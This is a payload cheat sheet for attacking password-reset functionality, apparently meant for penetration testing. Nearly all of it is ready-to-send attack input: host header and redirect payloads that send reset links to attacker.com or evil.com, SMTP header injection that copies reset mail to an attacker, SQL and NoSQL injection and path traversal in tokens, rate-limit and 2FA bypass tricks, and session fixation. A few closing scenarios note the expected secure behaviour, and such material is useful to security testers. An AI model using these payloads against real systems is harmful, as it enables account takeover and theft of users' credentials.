# Password Reset Vulnerability Payloads
# ============================================
# 1. HOST HEADER INJECTION PAYLOADS
# ============================================
# Basic host header manipulation
Host: attacker.com
Host: evil.com
Host: attacker.com:80
Host: localhost
# X-Forwarded headers
X-Forwarded-Host: attacker.com
X-Forwarded-Host: evil.com
X-Forwarded-Server: attacker.com
X-Host: attacker.com
X-Forwarded-For: attacker.com
# Absolute URL in Host header
Host: https://attacker.com
Host: http://evil.com/reset
# Host header with userinfo (@), null-byte and CRLF tricks
Host: example.com:@attacker.com
Host: example.com@attacker.com
Host: example.com%00.attacker.com
Host: example.com%0d%0aHost:%20attacker.com
# Multiple host headers
Host: example.com
Host: attacker.com
# Host header with path
Host: example.com/reset
Host: attacker.com/../example.com
# ============================================
# 2. PARAMETER POLLUTION PAYLOADS
# ============================================
# Multiple email parameters
email=victim@example.com&email=attacker@example.com
email[]=victim@example.com&email[]=attacker@example.com
email=victim@example.com,attacker@example.com
email=victim@example.com%20attacker@example.com
email=victim@example.com|attacker@example.com
email=victim@example.com;attacker@example.com
# Email with CC/BCC injection
email=victim@example.com%0Acc:attacker@example.com
email=victim@example.com%0Abcc:attacker@example.com
email=victim@example.com%0D%0ACC:attacker@example.com
email=victim@example.com%0d%0aBcc:attacker@example.com
# JSON array pollution
{"email": ["victim@example.com", "attacker@example.com"]}
{"email": "victim@example.com", "email": "attacker@example.com"}
# Multiple parameters with different names
email=victim@example.com&mail=attacker@example.com
email=victim@example.com&username=attacker
to=victim@example.com&cc=attacker@example.com
# ============================================
# 3. TOKEN MANIPULATION PAYLOADS
# ============================================
# Empty token
token=
token=%20
token=null
token=undefined
token=0
# Boolean bypass
token=true
token=false
token=1
token=0
# Array manipulation
token[]=valid_token
token[]=
token[0]=valid_token
# SQL injection in token
token=' OR '1'='1
token=1' OR '1'='1'--
token=' OR 1=1--
token=admin'--
token='; DROP TABLE tokens;--
# NoSQL injection in token
{"token": {"$gt": ""}}
{"token": {"$ne": null}}
{"token": {"$regex": ".*"}}
# Path traversal in token
token=../../../../../../etc/passwd
token=....//....//....//etc/passwd
token=..%2F..%2F..%2Fetc%2Fpasswd
# Token with special characters
token=<script>alert(1)</script>
token=javascript:alert(1)
token=%00
token=%0d%0a
# Wildcard token
token=*
token=%
token=.*
token=.+
# ============================================
# 4. USER IDENTIFIER MANIPULATION (IDOR)
# ============================================
# User ID manipulation
user_id=1
user_id=2
user_id=admin
user_id=0
user_id=-1
user_id=999999
# Username manipulation
username=admin
username=administrator
username=root
username=victim
# Email manipulation
email=admin@example.com
email=admin@localhost
email=root@localhost
# UUID manipulation
user_uuid=00000000-0000-0000-0000-000000000001
user_uuid=11111111-1111-1111-1111-111111111111
# Account ID variations
account_id=1&user_id=2
uid=admin
user=admin
# ============================================
# 5. RATE LIMITING BYPASS PAYLOADS
# ============================================
# IP header spoofing
X-Forwarded-For: 1.2.3.4
X-Forwarded-For: 127.0.0.1
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4
X-Remote-IP: 1.2.3.4
X-Remote-Addr: 1.2.3.4
X-Client-IP: 1.2.3.4
# Randomized IPs for each request
X-Forwarded-For: <random_ip>
X-Real-IP: 192.168.1.<1-255>
# Multiple IP headers
X-Forwarded-For: 1.1.1.1, 2.2.2.2, 3.3.3.3
X-Forwarded-For: 127.0.0.1
X-Real-IP: 192.168.1.1
# Session manipulation
session_id=<different_session_each_request>
PHPSESSID=<random_session>
# User agent rotation
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
# ============================================
# 6. WEAK TOKEN PATTERNS TO BRUTE FORCE
# ============================================
# 4-digit numeric codes
0000
0001
0002
...
9999
# 6-digit numeric codes (common OTP length)
000000
000001
...
999999
# Sequential tokens
token_1
token_2
token_3
# Timestamp-based tokens (Unix timestamp)
1609459200
1609459201
1609459202
# MD5 of simple inputs
5f4dcc3b5aa765d61d8327deb882cf99 (MD5 of "password")
e10adc3949ba59abbe56e057f20f883e (MD5 of "123456")
# Short alphanumeric (low entropy)
aaa
aab
aac
...
zzz
# Base64 encoded simple strings
YWRtaW4= (admin)
dGVzdA== (test)
MTIzNDU2 (123456)
# ============================================
# 7. RESPONSE MANIPULATION PAYLOADS
# ============================================
# Used when checking whether reset validation is enforced only client-side (left: original response body, right: tampered body)
{"valid": false} -> {"valid": true}
{"authenticated": false} -> {"authenticated": true}
{"error": "Invalid token"} -> {"success": "Token valid"}
{"status": 401} -> {"status": 200}
{"token_valid": false} -> {"token_valid": true}
# ============================================
# 8. ACCOUNT ENUMERATION PAYLOADS
# ============================================
# Valid vs invalid email testing
email=admin@example.com
email=administrator@example.com
email=test@example.com
email=nonexistent@example.com
email=invalid@invalid.invalid
# Username enumeration
username=admin
username=administrator
username=root
username=test
username=user
username=demo
username=guest
# Email format variations
email=admin
email=admin@
email=@example.com
email=admin@@example.com
email=admin@.com
# ============================================
# 9. EMAIL INJECTION PAYLOADS
# ============================================
# SMTP header injection
email=victim@example.com%0D%0ATo:attacker@evil.com
email=victim@example.com%0ABcc:attacker@evil.com
email=victim@example.com%0ASubject:Malicious
# Email with newline injection
email=victim@example.com%0A%0AAttacker content
email=victim@example.com\r\nBcc:attacker@evil.com
email=victim@example.com\nTo:attacker@evil.com
# Multiple recipients
email=victim@example.com,attacker@evil.com
email=victim@example.com;attacker@evil.com
email="victim@example.com, attacker@evil.com"
# ============================================
# 10. CRYPTO ANALYSIS PAYLOADS
# ============================================
# Test for weak encryption/encoding (the three values below are placeholders, not literal payloads)
token=base64_decode_this
token=rot13_this
token=hex_decode_this
# Known weak hashes to test
token=d41d8cd98f00b204e9800998ecf8427e (MD5 of empty string)
token=5d41402abc4b2a76b9719d911017c592 (MD5 of "hello")
# ============================================
# 11. TIME-BASED TESTING PAYLOADS
# ============================================
# Future timestamps
valid_until=9999999999
expires_at=2099-12-31
expiry=9999999999999
# Past timestamps (should be invalid)
timestamp=0
timestamp=1
created_at=1970-01-01
# ============================================
# 12. WORKFLOW BYPASS PAYLOADS
# ============================================
# Skip verification step
verified=true
email_verified=true
skip_verification=true
bypass=true
# Status manipulation
status=completed
status=verified
status=approved
password_reset_completed=true
# Step manipulation
step=1
step=3
skip_step=2
current_step=final
# ============================================
# 13. API-SPECIFIC PAYLOADS
# ============================================
# GraphQL mutations
{"query":"mutation{resetPassword(email:\"victim@example.com\"){success}}"}
{"query":"mutation{resetPassword(email:\"admin@example.com\",token:\"\"){success}}"}
# REST API variations
PUT /api/v1/users/1/password
PATCH /api/v1/password/reset
POST /api/reset
POST /api/v2/auth/forgot-password
# ============================================
# 14. SPECIAL CHARACTERS & ENCODING
# ============================================
# URL encoding
email=victim%40example.com
email=victim%2540example.com (double encoding)
# Unicode characters
email=victim@еxample.com (Cyrillic 'e')
email=admin@example.com
# Null bytes
email=victim@example.com%00
email=victim@example.com%00.attacker.com
token=valid_token%00
# HTML encoding
email=victim&#64;example.com
email=victim&commat;example.com
# ============================================
# 15. BUSINESS LOGIC BYPASS
# ============================================
# Negative values
user_id=-1
token_attempts=-1
rate_limit=-1
# Very large numbers
user_id=999999999
user_id=2147483647
user_id=9999999999999999999
# Array manipulation
user_id[]=1
user_id[]=2
emails[]=victim@example.com
# Type juggling
user_id="1"
user_id=1
user_id=true
user_id=null
# ============================================
# 16. CASE SENSITIVITY BYPASS
# ============================================
email=ADMIN@EXAMPLE.COM
email=Admin@Example.Com
username=ADMIN
username=AdMiN
token=ABCDEF
token=AbCdEf
# ============================================
# 17. LINK MANIPULATION
# ============================================
# Redirect after reset
redirect_url=https://attacker.com
return_url=https://evil.com
next=https://attacker.com/capture
callback=https://evil.com
# Open redirect in reset flow
redirect=//attacker.com
redirect=///attacker.com
redirect=/\/\attacker.com
redirect=//google.com@attacker.com
# ============================================
# 18. CORS & ORIGIN MANIPULATION
# ============================================
Origin: https://attacker.com
Origin: null
Referer: https://attacker.com/reset
Access-Control-Allow-Origin: *
# ============================================
# 19. RACE CONDITION PAYLOADS
# ============================================
# Send simultaneous requests
# Multiple threads requesting:
POST /reset-password with same token
POST /forgot-password for same email
POST /verify-token with same token
# ============================================
# 20. VERBOSE ERROR MESSAGES
# ============================================
# Submit different invalid inputs and compare the error messages for enumeration leaks:
email=nonexistent@example.com
# Expected: "Email not found" (reveals valid emails)
token=invalid
# Expected: "Invalid token" vs "Expired token" (information disclosure)
user_id=9999
# Expected: "User does not exist" (user enumeration)
# ============================================
# 21. CAPTCHA BYPASS
# ============================================
captcha=
g-recaptcha-response=
h-captcha-response=
recaptcha_token=null
captcha_token=
skip_captcha=true
# ============================================
# 22. TWO-FACTOR BYPASS VIA PASSWORD RESET
# ============================================
# Test if password reset bypasses 2FA
skip_2fa=true
bypass_2fa=true
2fa_enabled=false
require_otp=false
mfa_required=false
# ============================================
# 23. PASSWORD CONFIRMATION BYPASS
# ============================================
# Missing confirmation field
new_password=NewPass123
# (without confirm_password field)
# Mismatched passwords
new_password=NewPass123
confirm_password=DifferentPass456
# Empty confirmation
new_password=NewPass123
confirm_password=
# ============================================
# 24. WEAK PASSWORD ALLOWED
# ============================================
# Test if weak passwords are accepted in reset
new_password=123
new_password=password
new_password=admin
new_password=123456
new_password=12345678
new_password=qwerty
new_password=abc123
# ============================================
# 25. SESSION FIXATION
# ============================================
# Set session before reset
Cookie: session_id=attacker_controlled_value
PHPSESSID=attacker_session
# If the victim resets the password while this session is set and the server does not rotate it,
# the attacker-known session can then be used to access the account
# ============================================
# 26. HTTP METHOD TAMPERING
# ============================================
# Try different HTTP methods on reset endpoint
GET /api/reset-password?token=abc&password=new
PUT /api/reset-password
DELETE /reset-password
PATCH /reset-password
HEAD /reset-password
OPTIONS /reset-password
# ============================================
# 27. CONTENT-TYPE MANIPULATION
# ============================================
Content-Type: application/json
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data
Content-Type: text/plain
Content-Type: application/xml
# ============================================
# 28. PASSWORD IN RESPONSE
# ============================================
# Check if new password is returned in response
# After setting: new_password=SecretPass123
# Response should NOT contain:
{"password": "SecretPass123"}
{"new_password": "SecretPass123"}
# ============================================
# 29. NO CONFIRMATION EMAIL
# ============================================
# Test whether the user is notified after a password reset
# The user should receive a confirmation that the password was changed
# If not, an attacker can reset passwords without the owner noticing
# ============================================
# 30. TIMING ATTACKS
# ============================================
# Timing attack to enumerate users
# Measure response time difference:
email=valid@example.com (slower response)
email=invalid@example.com (faster response)
# ============================================
# TEST SCENARIOS
# ============================================
# Scenario 1: Reset without current password
POST /change-password
new_password=NewPassword123
# The server should require the old_password field
# Scenario 2: Token reuse
1. Get token: /forgot-password?email=test@example.com
2. Use token: /reset?token=abc123&password=new1
3. Try token again: /reset?token=abc123&password=new2
# Second attempt should fail
# Scenario 3: Expired token
1. Get token
2. Wait > expiration time
3. Try to use expired token
# Should be rejected
# Scenario 4: Token for different user
1. Request reset for user A
2. Get token for user A
3. Try to use it for user B
# Should be rejected
# Scenario 5: Multiple active tokens
1. Request reset (get token1)
2. Request reset again (get token2)
3. Use token1
# Record which applies: token1 still works, or only the latest token works (invalidating earlier tokens is the safer behaviour)